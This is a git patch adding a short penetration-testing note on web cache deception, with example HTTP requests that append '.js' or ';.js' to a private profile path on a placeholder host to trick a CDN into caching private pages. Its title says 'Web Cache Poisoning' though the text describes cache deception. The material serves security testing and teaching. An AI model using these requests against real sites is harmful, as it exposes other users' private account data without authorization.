From bb8f0e7b1ef4e30a4fb28d88c8e446da49e9f765 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <md15ev@gmail.com>
Date: Sat, 3 Sep 2022 16:31:44 +0700
Subject: [PATCH] Added Web Cache Deception

---
 Web Cache Deception.md | 52 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 Web Cache Deception.md

diff --git a/Web Cache Deception.md b/Web Cache Deception.md
new file mode 100644
index 0000000..70c49a8
--- /dev/null
+++ b/Web Cache Deception.md	
@@ -0,0 +1,52 @@
+# Web Cache Poisoning
+
+## Introduction
+Web Cache Deception is an attack in which an attacker deceives a caching proxy into improperly storing private information sent over the internet and gaining unauthorized access to that cached data
+
+## Where to find
+`-`
+
+## How to exploit
+* Normal Request
+```
+GET /profile/setting HTTP/1.1
+Host: www.vuln.com
+```
+The response is
+```
+HTTP/2 200 OK 
+Content-Type: text/html
+Cf-Cache-Status: HIT 
+...
+```
+
+1. Try to add cacheable extension (For example .js / .css / .jpg, etc.)
+```
+GET /profile/setting/.js HTTP/1.1
+Host: www.vuln.com
+```
+The response is
+```
+HTTP/2 200 OK 
+Content-Type: text/html
+Cf-Cache-Status: HIT 
+...
+```
+If the response is success, try to open the url in the incognito mode.
+
+2. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.)
+```
+GET /profile/setting/;.js HTTP/1.1
+Host: www.vuln.com
+```
+The response is
+```
+HTTP/2 200 OK 
+Content-Type: text/html
+Cf-Cache-Status: HIT 
+...
+```
+If the response is success, try to open the url in the incognito mode.
+
+## References
+* [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
\ No newline at end of file